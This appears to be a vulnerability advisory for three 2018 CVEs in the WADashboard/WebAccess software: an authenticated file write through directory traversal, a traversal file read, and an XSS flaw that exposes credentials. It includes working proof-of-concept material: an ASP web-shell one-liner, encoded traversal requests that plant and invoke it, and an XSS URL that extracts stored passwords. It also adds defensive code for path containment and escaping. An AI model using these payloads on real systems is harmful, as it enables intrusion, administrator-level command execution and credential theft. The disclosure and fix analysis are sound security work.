Multiple vulnerabilities were discovered that can be exploited remotely.
CVE-2018-15705: WADashboard API Authenticated Directory Traversal
A directory traversal vulnerability can be exploited remotely to write or overwrite files on the file system. It requires authentication, but exploitation succeeds with a low-privileged user.
Since the classic ASP web application coexists with the API, an attacker can write ASP scripts and then invoke those scripts without authentication. Note that the API process WADashboard.exe runs with Administrator OS privileges, so files can be written to almost any directory on disk.
Specifically, the vulnerability exists because the 'folderpath' parameter is not validated when handling HTTP POST requests to '/WADashboard/api/dashboard/v1/files/writeFile'. By crafting the folderpath value, an attacker can create an ASP script in C:\Inetpub\wwwroot\broadweb and achieve remote code execution.
The IIS web application is served from the Broadweb application pool, whose configured process identity means that an attacker's ASP code runs with those privileges by default. The webdobj.webdraw class can be instantiated from ASP and exposes the RemoteWinExec function; by calling it from ASP code, an attacker can execute OS commands with Administrator privileges.
The ASP code below can be written to a file to provide command execution:
<% Set t=Server.CreateObject("webdobj.webdraw"):t.RemoteWinExec Request.QueryString("p"),Request.QueryString("n"),Request.QueryString("c"):Response.Write "Executed command..."%>
The HTTP POST request below exploits the directory traversal and writes the ASP code as exec.asp into C:\Inetpub\wwwroot\broadweb\:
POST /WADashboard/api/dashboard/v1/files/writeFile?projectSpecies=myproject!savedConfiguration&folderpath=../../../../exec.asp&msg=%3c%25%20%53%65%74%20%74%3d%53%65%72%76%65%72%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%22%77%65%62%64%6f%62%6a%2e%77%65%62%64%72%61%77%22%29%3a%74%2e%52%65%6d%6f%74%65%57%69%6e%45%78%65%63%20%52%65%71%75%65%73%74%2e%51%75%65%72%79%53%74%72%69%6e%67%28%22%70%22%29%2c%52%65%71%75%65%73%74%2e%51%75%65%72%79%53%74%72%69%6e%67%28%22%6e%22%29%2c%52%65%71%75%65%73%74%2e%51%75%65%72%79%53%74%72%69%6e%67%28%22%63%22%29%3a%52%65%73%70%6f%6e%73%65%2e%57%72%69%74%65%20%22%45%78%65%63%75%74%65%64%20%63%6f%6d%6d%61%6e%64%2e%2e%2e%22%25%3e&overwrite=true HTTP/1.1
Once exec.asp is written, the attacker can adapt the URL below to execute a command of their choice. Note that the 'p' and 'n' parameter values (a project name and a node name) must be valid; they can be determined by enumeration.
http://192.168.1.194/broadweb/exec.asp?p=myproject&n=mynode&c=calc.exe
CVE-2018-15706: WADashboard API Authenticated Directory Traversal
A directory traversal vulnerability can be exploited remotely to read arbitrary files on the file system. It does require authentication, which can be obtained with a WebAccess account that has restricted privileges (i.e. a non-Power user). Note that the API process WADashboard.exe runs with Administrator OS privileges, so almost every file is readable.
The vulnerability exists because the 'filepath' parameter is not validated when handling HTTP GET requests to '/WADashboard/api/dashboard/v1/files/readFile'. By crafting the filepath value, an attacker can read any file on the file system.
The HTTP request below reads C:\Windows\win.ini. Note that the project name (here myproject) must be valid:
GET /WADashboard/api/dashboard/v1/files/readFile?projectSpecies=myproject!savedDashboard&filepath=../../../../../../../windows/win.ini&_=1540926323132 HTTP/1.1
The corresponding JSON response body is shown below:
{"resStatus":"0","resString":"!for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n[mci extensions]\r\n[files]\r\n[Mail]\r\nMAPI=1"}
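The block below is an added example, not code from the advisory or from the product. It decodes the two proof-of-concept request targets quoted above (recovering the ASP one-liner from the percent-encoded 'msg' parameter), shows where a plain path join lets the folderpath and filepath traversals land, and applies the containment check that the writeFile and readFile handlers are missing. The on-disk layout of project folders (ASSUMED_PROJECTS_ROOT and the split of projectSpecies on '!') is an assumption chosen so that the traversal depths in the two requests land where the advisory says they do; the real layout is not given here.

```python
"""Added example; not the advisory's or the product's code.

Decodes the WADashboard writeFile/readFile proof-of-concept requests,
shows where a naive path join lets the traversal land, and applies the
containment check the vulnerable handlers lack. The project directory
layout below is an assumption, not the real one.
"""
import json
import ntpath
from urllib.parse import parse_qs, urlsplit

# Request targets copied from the advisory's proof-of-concept requests.
WRITE_TARGET = (
    "/WADashboard/api/dashboard/v1/files/writeFile"
    "?projectSpecies=myproject!savedConfiguration"
    "&folderpath=../../../../exec.asp"
    "&msg=%3c%25%20%53%65%74%20%74%3d%53%65%72%76%65%72%2e%43%72%65%61"
    "%74%65%4f%62%6a%65%63%74%28%22%77%65%62%64%6f%62%6a%2e%77%65"
    "%62%64%72%61%77%22%29%3a%74%2e%52%65%6d%6f%74%65%57%69%6e%45"
    "%78%65%63%20%52%65%71%75%65%73%74%2e%51%75%65%72%79%53%74%72"
    "%69%6e%67%28%22%70%22%29%2c%52%65%71%75%65%73%74%2e%51%75%65"
    "%72%79%53%74%72%69%6e%67%28%22%6e%22%29%2c%52%65%71%75%65%73"
    "%74%2e%51%75%65%72%79%53%74%72%69%6e%67%28%22%63%22%29%3a%52"
    "%65%73%70%6f%6e%73%65%2e%57%72%69%74%65%20%22%45%78%65%63%75"
    "%74%65%64%20%63%6f%6d%6d%61%6e%64%2e%2e%2e%22%25%3e"
    "&overwrite=true"
)
READ_TARGET = (
    "/WADashboard/api/dashboard/v1/files/readFile"
    "?projectSpecies=myproject!savedDashboard"
    "&filepath=../../../../../../../windows/win.ini"
    "&_=1540926323132"
)
# readFile response body quoted in the advisory (raw string keeps the JSON escapes).
READ_RESPONSE = (r'{"resStatus":"0","resString":"!for 16-bit app support\r\n[fonts]\r\n'
                 r'[extensions]\r\n[mci extensions]\r\n[files]\r\n[Mail]\r\nMAPI=1"}')

# ASSUMPTION: per-project folders live here and "project!species" picks a subfolder.
ASSUMED_PROJECTS_ROOT = r"C:\Inetpub\wwwroot\broadweb\WADashboard\projects"


def parse_target(target):
    """Split a request target into its path and single-valued query parameters."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    return parts.path, {key: values[0] for key, values in query.items()}


def project_folder(project_species):
    """Map the projectSpecies parameter to a folder (assumed layout, see above)."""
    project, _, species = project_species.partition("!")
    return ntpath.join(ASSUMED_PROJECTS_ROOT, project, species)


def naive_join(root, user_path):
    """What the vulnerable handlers effectively do: join and let '..' walk out."""
    return ntpath.normpath(ntpath.join(root, user_path))


def resolve_under(root, user_path):
    """Containment check the handlers lack: the normalized target when it stays
    inside root, else None. ntpath gives Windows semantics (both slash kinds,
    drive letters, case-insensitive compare) on any OS."""
    root = ntpath.normpath(root)
    candidate = naive_join(root, user_path)
    root_cmp, cand_cmp = ntpath.normcase(root), ntpath.normcase(candidate)
    if cand_cmp != root_cmp and not cand_cmp.startswith(root_cmp + "\\"):
        return None
    return candidate


def audit_request(target, path_param):
    """Evaluate a writeFile ('folderpath') or readFile ('filepath') target."""
    _, params = parse_target(target)
    root = project_folder(params["projectSpecies"])
    return {
        "root": root,
        "lands_at": naive_join(root, params[path_param]),   # vulnerable behaviour
        "allowed": resolve_under(root, params[path_param]),  # hardened behaviour
        "params": params,
    }


def read_file_lines(response_body):
    """Extract the file content from a readFile JSON response; None on error."""
    body = json.loads(response_body)
    if body.get("resStatus") != "0":
        return None
    return body["resString"].splitlines()
```

The check compares normalized, case-folded paths with a trailing separator so that a sibling folder with the same prefix (for example ...\savedDashboard2) is not mistaken for a child, and absolute or drive-relative values such as C:\Windows\win.ini or \Windows\win.ini are rejected because ntpath.join discards the root for them.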
CVE-2018-15707: bwmainleft.asp User Credential Disclosure
A reflected cross-site scripting vulnerability exists in /broadweb/bwmainleft.asp because GET parameters are not properly validated or sanitized. The credentials of the active session are written into the HTML source and are accessible from client-side JavaScript.
Several parameters are affected; the 'pname' parameter deserves particular attention because its raw value is written into a JavaScript block on the page. The code snippet below from bwmainleft.asp shows the ASP code writing the username and password directly into the page:
… snip …
pname = Request.QueryString("pname")
… snip …
username = session("UserName")
'get the password if admin
if username = "admin" then
    sql = "SELECT * FROM pUserPassword WHERE UserName='" + username + "'"
else
    sql = "SELECT * FROM pAdmin WHERE UserName='" + username + "'"
end if
dbTab.open sql,cfgConn,3,2,1
'get the password from database based on the user name, note that only admin can actually log into dashboard here
if not dbTab.eof then
    set tWAObj = Server.CreateObject("webdobj.webdraw")
    GetUserPwdField dbTab, tWAObj, UsrArr 'get the password from db
    pwd = UsrArr(0)
%>
… snip …
Proof-of-concept URL:
http://192.168.1.194/broadweb/bwmainleft.asp?pid=1&pname=%22);alert(document.getElementsByTagName(%27script%27)[4].text);//
Digging deeper, the cross-site scripting vulnerability can be used to extract the username and password values, so an attacker can use this technique to steal credentials. The accompanying screenshot shows the username admin and the password scooby.
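The block below is an added example, not code from the advisory or from the product. It models the bwmainleft.asp pattern in JavaScript: Request.QueryString("pname") is concatenated unescaped into a script block on a page that also embeds the session's username and password, and the pname value from the proof-of-concept URL above closes the string and the surrounding call, then reads the script element's text. The concrete layout of that script block (a showProject("...") call, the credential variable names, the injected script being the fifth <script> on the page) is assumed; the hardened rendering beside it uses a proper JavaScript string-literal encoding.

```javascript
// Added example, not code from the advisory or from WebAccess. Models how an
// unescaped pname value lands inside a <script> block next to the session's
// credentials, and how proper JS string encoding stops the breakout. The
// script layout (showProject call, variable names, fifth <script>) is assumed.

// pname value from the advisory's proof-of-concept URL, URL-decoded.
const POC_PNAME = "\");alert(document.getElementsByTagName('script')[4].text);//";

// Vulnerable rendering: mimics <%= pname %> written raw inside a JS string.
function renderVulnerable(pname, username, password) {
  return 'showProject("' + pname + '");\n' +
         'var username = "' + username + '";\n' +
         'var password = "' + password + '";\n';
}

// Encode a value as a JS string literal that is also safe inside <script>:
// JSON.stringify handles quotes, backslashes and newlines; "<", ">", U+2028 and
// U+2029 are escaped so the value can neither close the script element nor
// break the statement.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Hardened rendering of the same block.
function renderHardened(pname, username, password) {
  return "showProject(" + jsStringLiteral(pname) + ");\n" +
         "var username = " + jsStringLiteral(username) + ";\n" +
         "var password = " + jsStringLiteral(password) + ";\n";
}

// Stand-in for the browser: runs the rendered block with a fake document whose
// fifth <script> is the block itself, and records what alert() and
// showProject() receive.
function execute(scriptText) {
  const scripts = [0, 1, 2, 3].map((i) => ({ text: "/* script " + i + " */" }));
  scripts.push({ text: scriptText });
  const leaked = [];
  const shown = [];
  const document = {
    getElementsByTagName: (tag) => (tag.toLowerCase() === "script" ? scripts : []),
  };
  new Function("document", "alert", "showProject", scriptText)(
    document, (msg) => leaked.push(String(msg)), (name) => shown.push(name));
  return { shown, leaked };
}

// Demonstration: the raw rendering executes the injected alert and hands it the
// script text containing the password; the hardened rendering passes the same
// value through as an ordinary string.
const vulnerable = execute(renderVulnerable(POC_PNAME, "admin", "scooby"));
const hardened = execute(renderHardened(POC_PNAME, "admin", "scooby"));
console.log("vulnerable leaked:", vulnerable.leaked.length, "hardened leaked:", hardened.leaked.length);
```

Escaping the value stops the script injection, but it does not address the disclosure itself: as long as the password is rendered into the page, any other script-injection point or a same-origin script can still read it, so the complete fix is to stop writing the credential into the HTML at all.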